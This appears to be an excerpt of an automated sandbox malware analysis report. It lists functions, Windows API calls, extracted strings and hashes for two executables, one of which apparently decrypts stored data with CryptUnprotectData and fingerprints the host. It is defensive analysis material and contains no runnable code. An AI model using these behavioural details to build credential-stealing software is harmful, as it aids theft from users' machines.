Instruction ID: d728a3f72b435cfc133891c3fd89ffc08e8f0ff0a28b8e78d692ad235b997e58
Opcode Fuzzy Hash: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
Instruction Fuzzy Hash: 46218362A50105B6EB348E64CD09BB77BAAFF84B5DF468564ED09F7204F732DA40C398

Function 0043AE69 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE

Download Yara Rule

APIs

GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,0043B0C4,?,00000050,?,?,?,?,?), ref: 0043AF44

Strings

ACP, xrefs: 0043AE87
OCP, xrefs: 0043AEBD

Memory Dump Source

Source File: 00000000.00000002.4130251057.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TUp6f2knn2.jbxd

Similarity

API ID:
String ID: ACP$OCP
API String ID: 0-711371036
Opcode ID: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
Instruction ID: 14488b359d73a2b35151aaad325e7c1d9f20b01c06d3923b8e2598dc1437a59e
Opcode Fuzzy Hash: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
Instruction Fuzzy Hash: F3212BA2AC4101A6DB30CB54C907B977366EF5CB11F569526E98AC7300F73ADD11C39E

Function 00401F0A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

GdipGetImageEncodersSize.GDIPLUS(?,?), ref: 00401F25
GdipGetImageEncoders.GDIPLUS(?,?,00000000), ref: 00401F4A

Strings

image/png, xrefs: 00401F58

Memory Dump Source

Source File: 00000000.00000002.4130251057.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TUp6f2knn2.jbxd

Similarity

API ID: EncodersGdipImage$Size
String ID: image/png
API String ID: 864223233-2966254431
Opcode ID: a4116aea5856e167c2c377b93ae464baf6efd33a5122bb5b4e0eea2d33bbdf28
Instruction ID: a861e299a60b9ced5094bb1731eec5177a5b987cbaa8a1425c649574426e8627
Opcode Fuzzy Hash: a4116aea5856e167c2c377b93ae464baf6efd33a5122bb5b4e0eea2d33bbdf28
Instruction Fuzzy Hash: 04119476D00109FFCB01AFA99C8149EBB76FE41321B60027BE810B21E0C7755F419A58

Function 0040EF26 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32(0000000D,?,0040DE41,0040C659,?,?,00000000,?,0040C529,0045D5E4,0040C4F6,0045D5DC,?,ios_base::failbit set,0040C659), ref: 0040EFAA

Strings

F(@, xrefs: 0040EF29

Memory Dump Source

Source File: 00000000.00000002.4130251057.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TUp6f2knn2.jbxd

Similarity

API ID: ErrorLast
String ID: F(@
API String ID: 1452528299-2698495834
Opcode ID: 28a02ce365c990727b7b4e8bf51613b6bc71088fada4a4c5b2d2716d252c928d
Instruction ID: 02fe8a739a07683bc60ca74788e4bb9a0325118a5e4d2b20450d6bc28493fa7e
Opcode Fuzzy Hash: 28a02ce365c990727b7b4e8bf51613b6bc71088fada4a4c5b2d2716d252c928d
Instruction Fuzzy Hash: 2B11C236300216BFCF165F66DD4496AB765BB08B11B11483AFA05A6290CA7498219BD9

Function 0040C510 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 39COMMON

Download Yara Rule

APIs

___std_exception_destroy.LIBVCRUNTIME ref: 0040C554

Strings

F(@, xrefs: 0040C547
ios_base::failbit set, xrefs: 0040C510

Memory Dump Source

Source File: 00000000.00000002.4130251057.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TUp6f2knn2.jbxd

Similarity

API ID: ___std_exception_destroy
String ID: F(@$ios_base::failbit set
API String ID: 4194217158-1828034088
Opcode ID: 326c062bbd77b351e70a003f48f611e5e8c7415ec1b2fbce5622d8111c151cd5
Instruction ID: 4ba2cac2fce41df0eb0aef52a6a00c17a8a4a8275336f9ee0f9be7dda5d805c6
Opcode Fuzzy Hash: 326c062bbd77b351e70a003f48f611e5e8c7415ec1b2fbce5622d8111c151cd5
Instruction Fuzzy Hash: 27F0B472A0022836D2302B56BC02B97F7CC8F50B69F14443FFE05A6681EBF8A94581EC

Function 0041DA0B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38COMMON

Download Yara Rule

APIs

std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041DA53
__CxxThrowException@8.LIBVCRUNTIME ref: 0041DA61

Strings

pContext, xrefs: 0041DA4B

Memory Dump Source

Source File: 00000000.00000002.4130251057.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TUp6f2knn2.jbxd

Similarity

API ID: Exception@8Throwstd::invalid_argument::invalid_argument
String ID: pContext
API String ID: 1687795959-2046700901
Opcode ID: 8b89fd2ebf5a6180650f95f800d5794784ed0f3246bc88bba9479147dd287627
Instruction ID: 9bb5f33597777ba4e98b1388dc571d1ac2d7347b1e1174399eb2bf06ad7e47b8
Opcode Fuzzy Hash: 8b89fd2ebf5a6180650f95f800d5794784ed0f3246bc88bba9479147dd287627
Instruction Fuzzy Hash: DDF05939B005155BCB04EB59DC45C6EF7A8AF85760310017BFD01E3342CBB8ED058698

Function 0044068A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 00440691

Strings

RCC, xrefs: 004406C3
MOC, xrefs: 004406B4

Memory Dump Source

Source File: 00000000.00000002.4130251057.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TUp6f2knn2.jbxd

Similarity

API ID: H_prolog3_catch
String ID: MOC$RCC
API String ID: 3886170330-2084237596
Opcode ID: 97e7bd69da2a212c52dfa9d68122ee8a36af56c02b3e00c92559e584b2ae2017
Instruction ID: e9e4e095770ca636dcca3efe7f5224ff47edcbfbbe98bab9d98b6a8866433d4c
Opcode Fuzzy Hash: 97e7bd69da2a212c52dfa9d68122ee8a36af56c02b3e00c92559e584b2ae2017
Instruction Fuzzy Hash: 81F0AF70600224CFDB22AF95D40159D3B60AF82748F8281A7F9009B262C73C6E14CFAE

Function 00404E07 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON

Download Yara Rule

APIs

std::_Locinfo::_Locinfo.LIBCPMT ref: 00404E3C

Part of subcall function 0040BF5D: std::_Lockit::_Lockit.LIBCPMT ref: 0040BF71
Part of subcall function 0040BF5D: std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040BFAE

std::_Locinfo::~_Locinfo.LIBCPMT ref: 00404E50

Part of subcall function 0040C008: std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 0040C02F
Part of subcall function 0040C008: std::_Lockit::~_Lockit.LIBCPMT ref: 0040C0A0

Strings

F@, xrefs: 00404E48

Memory Dump Source

Source File: 00000000.00000002.4130251057.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TUp6f2knn2.jbxd

Similarity

API ID: std::_$Locinfo::_$LocinfoLockit$Locinfo::~_Locinfo_ctorLocinfo_dtorLockit::_Lockit::~_
String ID: F@
API String ID: 2118720939-885931407
Opcode ID: ab390ea3e88c8ea055363ab8ec40643519a30a11bb7225da03181527fb8750d3
Instruction ID: 13870e84e441ff14f0459789a428ac9660f365acd1e629d5c6e8dadf1a096d8e
Opcode Fuzzy Hash: ab390ea3e88c8ea055363ab8ec40643519a30a11bb7225da03181527fb8750d3
Instruction Fuzzy Hash: 7CF034B2410205DAEB21AF50C412B9973B4BF80B15F61813FE545AB2C1DB786949CB89

Function 0042381B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18COMMON

Download Yara Rule

APIs

Concurrency::details::InternalContextBase::~InternalContextBase.LIBCONCRT ref: 0042382E

Strings

~B, xrefs: 00423827
zB, xrefs: 00423821

Memory Dump Source

Source File: 00000000.00000002.4130251057.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TUp6f2knn2.jbxd

Similarity

API ID: ContextInternal$BaseBase::~Concurrency::details::
String ID: zB$~B
API String ID: 3275300208-395995950
Opcode ID: a1da6c89fa2dfd945bd02a2cb13c6e7ff4bb2a0d62993eedb0658c40d2c20ec7
Instruction ID: f55228a66ce0378ecda15d2e29e2cf9b619ecd1f8f2314d3bfe00ef4b4db5243
Opcode Fuzzy Hash: a1da6c89fa2dfd945bd02a2cb13c6e7ff4bb2a0d62993eedb0658c40d2c20ec7
Instruction Fuzzy Hash: 83D05B7124C32525E2256A4974057857AD84B01764F50803FF94456682CBB9654442DC

Function 004212BC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17COMMON

Download Yara Rule

APIs

std::invalid_argument::invalid_argument.LIBCONCRT ref: 004212DB
__CxxThrowException@8.LIBVCRUNTIME ref: 004212E9

Strings

pThreadProxy, xrefs: 004212D3

Memory Dump Source

Source File: 00000000.00000002.4130251057.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TUp6f2knn2.jbxd

Similarity

API ID: Exception@8Throwstd::invalid_argument::invalid_argument
String ID: pThreadProxy
API String ID: 1687795959-3651400591
Opcode ID: a6860d66e6dfc760da51a725ddbc90d8fa67c7294f8bcc7dcd6806e1c2d97e2b
Instruction ID: be918fe35ab2875efcd6209978594ad56e839e7639c00e6f4a717d1a784130ad
Opcode Fuzzy Hash: a6860d66e6dfc760da51a725ddbc90d8fa67c7294f8bcc7dcd6806e1c2d97e2b
Instruction Fuzzy Hash: DED05B71E0020856D700E7B6D806F9F77A85B10708F50427B7D14E6186DB79E50886AC

Function 0255B0F1 Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,02532AAD,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,02532AAD,00000000), ref: 0255B187
GetLastError.KERNEL32 ref: 0255B195
MultiByteToWideChar.KERNEL32(?,00000001,?,?,02532AAD,00000000), ref: 0255B1F0

Memory Dump Source

Source File: 00000000.00000002.4130755786.0000000002530000.00000040.00001000.00020000.00000000.sdmp, Offset: 02530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2530000_TUp6f2knn2.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: e536570b9c15492d0518b6f8e8b2d6b0fefd1f832faf498bff9e3d376521cf30
Instruction ID: 9554de7fa81bb1da5cdb55ab464a062a755674f7e741ad486bafc8baed3b7a9e
Opcode Fuzzy Hash: e536570b9c15492d0518b6f8e8b2d6b0fefd1f832faf498bff9e3d376521cf30
Instruction Fuzzy Hash: 0C41F830600226AFCF218F65C86C77E7FA5FF41718F24416AEC599B1A4DB30CA01CB68

Function 0042AE8A Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,F(@,00000000), ref: 0042AF20
GetLastError.KERNEL32 ref: 0042AF2E
MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000), ref: 0042AF89

Memory Dump Source

Source File: 00000000.00000002.4130251057.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TUp6f2knn2.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: 52d4a7004019297d44bc7c19dc2dfefffb9580c93fe43c28174d6fe013107c11
Instruction ID: 9270b5025f3a17d6db836abfdfc26bc83889a51b194ae21b206bd0a56260f073
Opcode Fuzzy Hash: 52d4a7004019297d44bc7c19dc2dfefffb9580c93fe43c28174d6fe013107c11
Instruction Fuzzy Hash: 5F410770700222AFCB219F65EA44BABBBB4EF01311F56416BFC5597291DB3C8D11C75A

Analysis Process: B4A1.tmp.exePID: 7460, Parent PID: 7344COMMON

Execution Graph

Execution Coverage:	3.9%
Dynamic/Decrypted Code Coverage:	17.3%
Signature Coverage:	26.5%
Total number of Nodes:	162
Total number of Limit Nodes:	8

Executed Functions

Function 00437DF0 Relevance: 28.6, APIs: 11, Strings: 5, Instructions: 640
memorycomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoCreateInstance.OLE32(0044168C,00000000,00000001,0044167C,00000000), ref: 00438034
SysAllocString.OLEAUT32()\"^), ref: 004380C3
CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00438101
SysAllocString.OLEAUT32()\"^), ref: 0043817E
SysAllocString.OLEAUT32()\"^), ref: 00438238
VariantInit.OLEAUT32(C7C6C5CC), ref: 004382A8
VariantClear.OLEAUT32(?), ref: 004383F9
SysFreeString.OLEAUT32(?), ref: 0043841D
SysFreeString.OLEAUT32(?), ref: 00438423
SysFreeString.OLEAUT32(00000000), ref: 00438430
GetVolumeInformationW.KERNELBASE(?,00000000,00000000,66966446,00000000,00000000,00000000,00000000), ref: 00438468

Strings

)\"^, xrefs: 004380BE, 004380C2, 0043817D, 00438237, 0043845B
.H4J, xrefs: 0043805A
P%R, xrefs: 0043804A
O@, xrefs: 0043806A
pq, xrefs: 004382E2

Memory Dump Source

Source File: 00000001.00000002.2189214532.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2189214532.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_B4A1.jbxd

Similarity

API ID: String$AllocFree$Variant$BlanketClearCreateInformationInitInstanceProxyVolume
String ID: P%R$)\"^$.H4J$O@$pq
API String ID: 2573436264-1397720406
Opcode ID: 99389cd6846ffddf47e3914131a3c94635c8c48cfc52d90ecef9ec7663b7e69d
Instruction ID: 8d1c6a9ba2bf63fa8fe487279597ba15b590cfaf954231a8494ef46f424a72d4
Opcode Fuzzy Hash: 99389cd6846ffddf47e3914131a3c94635c8c48cfc52d90ecef9ec7663b7e69d
Instruction Fuzzy Hash: D022EFB2A483418BD314CF25C880B5BBBE5EFC9704F148A2DF5919B381E779D909CB96

Function 00415799 Relevance: 14.5, APIs: 1, Strings: 7, Instructions: 492
encryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00415BAF

Strings

oA&C, xrefs: 00415CE6
X, xrefs: 00415DD2
8MNO, xrefs: 00415C36
~, xrefs: 0041596E
<I2K, xrefs: 00415C2B
RXA, xrefs: 00415842
NDNK, xrefs: 00415D85

Memory Dump Source

Source File: 00000001.00000002.2189214532.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2189214532.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_B4A1.jbxd

Similarity

API ID: CryptDataUnprotect
String ID: 8MNO$<I2K$NDNK$RXA$X$oA&C$~
API String ID: 834300711-3328159043
Opcode ID: 7d14a55b692df4f7a5a1489c3381dac725c5f5ca9d3437b0e32695eadac0db18
Instruction ID: b39a018424f603aff0b8ca9a117b68807cb953dc34c5f22e55a732b949ac1150
Opcode Fuzzy Hash: 7d14a55b692df4f7a5a1489c3381dac725c5f5ca9d3437b0e32695eadac0db18
Instruction Fuzzy Hash: 90F125B6608740CFC720CF29D8817EBB7E1AFD5314F194A2EE4D997251EB389845CB86

Function 00409580 Relevance: 9.2, Strings: 7, Instructions: 442
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

99070288BC32E24AAC8923850305D13E, xrefs: 00409642
Tiec, xrefs: 00409963
\, xrefs: 0040978A
+8=>, xrefs: 00409782
r, xrefs: 004095F4
#4<7, xrefs: 00409772
PK, xrefs: 004099E1

Memory Dump Source

Source File: 00000001.00000002.2189214532.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2189214532.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_B4A1.jbxd

Similarity

API ID:
String ID: #4<7$+8=>$99070288BC32E24AAC8923850305D13E$PK$Tiec$\$r
API String ID: 0-2033671377
Opcode ID: 8a87d060594a504fb9fb2c8fb36e58836b617313b2e0b34c62a439b04e6c237f
Instruction ID: 6053270823643479f5a9008bd7dab94ee1cb24749ea6a1c2bb59c6b2eb0b3cac
Opcode Fuzzy Hash: 8a87d060594a504fb9fb2c8fb36e58836b617313b2e0b34c62a439b04e6c237f
Instruction Fuzzy Hash: 29D12476A087409BD318CF35C85166BBBE2EBD1318F18893DE5E69B391D738C905CB46

Function 00408850 Relevance: 7.7, APIs: 5, Instructions: 194
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcessId.KERNEL32 ref: 0040891C
GetCurrentThreadId.KERNEL32 ref: 00408925
SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 004089DB
GetForegroundWindow.USER32 ref: 00408A33

Part of subcall function 0040C550: CoInitializeEx.COMBASE(00000000,00000002), ref: 0040C563

Part of subcall function 0040B390: FreeLibrary.KERNEL32(00408AB8), ref: 0040B396
Part of subcall function 0040B390: FreeLibrary.KERNEL32 ref: 0040B3B7

ExitProcess.KERNEL32 ref: 00408AD1

Memory Dump Source

Source File: 00000001.00000002.2189214532.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2189214532.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_B4A1.jbxd

Similarity

API ID: CurrentFreeLibraryProcess$ExitFolderForegroundInitializePathSpecialThreadWindow
String ID:
API String ID: 3072701918-0
Opcode ID: 80d43e03976d674c32d86d2947b6f6748d05092d2929b392bf544b78baad5a14
Instruction ID: 4e8ceca9db94e69365d2c2d7f1aefafb9de861df3649afd20bfce81a3928f3be
Opcode Fuzzy Hash: 80d43e03976d674c32d86d2947b6f6748d05092d2929b392bf544b78baad5a14
Instruction Fuzzy Hash: 9351A9BBF102180BD71CAEAACD463A675878BC5710F1F813E5985EB7D6EDB88C0142C9

Function 004096C1 Relevance: 6.6, Strings: 5, Instructions: 335
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Tiec, xrefs: 00409963
\, xrefs: 0040978A
+8=>, xrefs: 00409782
#4<7, xrefs: 00409772
PK, xrefs: 004099E1

Memory Dump Source

Source File: 00000001.00000002.2189214532.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2189214532.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_B4A1.jbxd

Similarity

API ID:
String ID: #4<7$+8=>$PK$Tiec$\
API String ID: 0-3498454814
Opcode ID: 08af39ec684b2e8c8c7539f0c50152cbd04d4d5768ce934c1ccd13a0086aca6c
Instruction ID: ec43dc8aada6c0e01d29c87bcd83570c0fdc998820d78b0374825785abd26213
Opcode Fuzzy Hash: 08af39ec684b2e8c8c7539f0c50152cbd04d4d5768ce934c1ccd13a0086aca6c
Instruction Fuzzy Hash: 2BA1F2766087508BC718CF25C85266FBBE1ABC1318F18593DE5D6DB391D738C905CB8A

Function 0043C1F0 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(0043E31B,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043C21E

Memory Dump Source

Source File: 00000001.00000002.2189214532.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2189214532.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_B4A1.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82

Function 0043C767 Relevance: 1.3, Strings: 1, Instructions: 99COMMON

Download Yara Rule

Strings

,+*), xrefs: 0043C790

Memory Dump Source

Source File: 00000001.00000002.2189214532.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2189214532.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_B4A1.jbxd

Similarity

API ID:
String ID: ,+*)
API String ID: 0-3529585375
Opcode ID: e7fb2fe7fc15d814734d125e3abc6185c50616f6403d63d9b463f0ac7ddf630e
Instruction ID: 95b520c28a51d7a8debe208fb8c6725e065a55489a7142fefcc330b3f2274472
Opcode Fuzzy Hash: e7fb2fe7fc15d814734d125e3abc6185c50616f6403d63d9b463f0ac7ddf630e
Instruction Fuzzy Hash: 7331A539B402119BEB18CF58CCD1BBEB7B2BB49301F249129D501B7390CB75AD018B58

Function 00422190 Relevance: .3, Instructions: 330COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2189214532.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2189214532.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_B4A1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1235eeb8cf710a390d5557258a43f903d8b0ebafe0fc0a19c3d367544ede0ca8
Instruction ID: a24f2a78553098ad8a5e3b5bc8abd089333314a4ae9ebed43d08ec28266042c4
Opcode Fuzzy Hash: 1235eeb8cf710a390d5557258a43f903d8b0ebafe0fc0a19c3d367544ede0ca8
Instruction Fuzzy Hash: 9D9126B1B04321ABD7209F20DD91B77B3A5EF91318F14482DE9869B381E7B9E904C75A

Function 024B003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 024B024D

Strings

kernel32.dll, xrefs: 024B008F, 024B0095
cess, xrefs: 024B018D

Memory Dump Source

Source File: 00000001.00000002.2189788211.00000000024B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24b0000_B4A1.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: ed7daa7ddff39a72fcb3f553f3f8b8c31c846d27a4821ffb9464b0ce1f7a7a5d
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: D6526A74A01229DFDB65CF58C984BADBBB1BF09305F1480DAE54DAB351DB30AA85CF24

Function 0095B02E Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 0095B056
Module32First.KERNEL32(00000000,00000224), ref: 0095B076

Memory Dump Source

Source File: 00000001.00000002.2189547236.000000000095A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0095A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_95a000_B4A1.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: 256f4db2fe74041488abf46ff0f2f4a4129c5e6eba32c64c17cc74dc1eccbb70
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: 60F096315007116FD7207BF6A88DB6F76ECBF49726F100628FA52914C0DBB0EC494B61

Function 024B0E0F Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00000400,?,?,024B0223,?,?), ref: 024B0E19
SetErrorMode.KERNELBASE(00000000,?,?,024B0223,?,?), ref: 024B0E1E

Memory Dump Source

Source File: 00000001.00000002.2189788211.00000000024B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24b0000_B4A1.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: b25280a7d5a245074ce1b288960052ef9f67ce7971dda664f71e596d7bd501e9
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: 84D0123514512877DB012A94DC09BCE7B1CDF05B67F008011FB0DD9180C770954046E5

Function 0043C2C8 Relevance: 1.5, APIs: 1, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetForegroundWindow.USER32 ref: 0043CCAF

Memory Dump Source

Source File: 00000001.00000002.2189214532.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2189214532.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_B4A1.jbxd

Similarity

API ID: ForegroundWindow
String ID:
API String ID: 2020703349-0
Opcode ID: ee62edd4f90ceb3851fb76d6bb2596050db7060e58c86fce7ad8149e0838c105
Instruction ID: 8fb46afbfb550afb85baefcd5c24b2e1a72551ea741637eac68a3138d718cba2
Opcode Fuzzy Hash: ee62edd4f90ceb3851fb76d6bb2596050db7060e58c86fce7ad8149e0838c105
Instruction Fuzzy Hash: 07F04CBAD005408BDB044B75CC821A67BA2DB5F320B18897DD441E3384C63C5807CB5D

Function 0043C180 Relevance: 1.5, APIs: 1, Instructions: 35
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlReAllocateHeap.NTDLL(?,00000000,?,00000000,?,?,0040B2E4,00000000,00000001), ref: 0043C1B2

Memory Dump Source

Source File: 00000001.00000002.2189214532.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2189214532.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_B4A1.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: d479befdbac128fe149772a9185de956813756a2e3e272a70dac7c9e8d919251
Instruction ID: ec0cbf63999808cd9fde2cf832404b9ab0848eb4eaaead86bc709d6aa026588d
Opcode Fuzzy Hash: d479befdbac128fe149772a9185de956813756a2e3e272a70dac7c9e8d919251
Instruction Fuzzy Hash: 59F0E977808211EBD2003F257C01A5736649F8F735F01587AFC0152112D739D422E6AF

Function 0040C550 Relevance: 1.5, APIs: 1, Instructions: 17COMMON

Download Yara Rule

APIs

CoInitializeEx.COMBASE(00000000,00000002), ref: 0040C563

Memory Dump Source

Source File: 00000001.00000002.2189214532.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2189214532.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_B4A1.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 6fc60a274ed566bab613781af0777c43ce176e621231eb36fbaf2a6aedf8035e
Instruction ID: e03bcfaf696d6c281ff3d22d3b8d0c31e3889364fa9117d67ae1079de8c3c82d
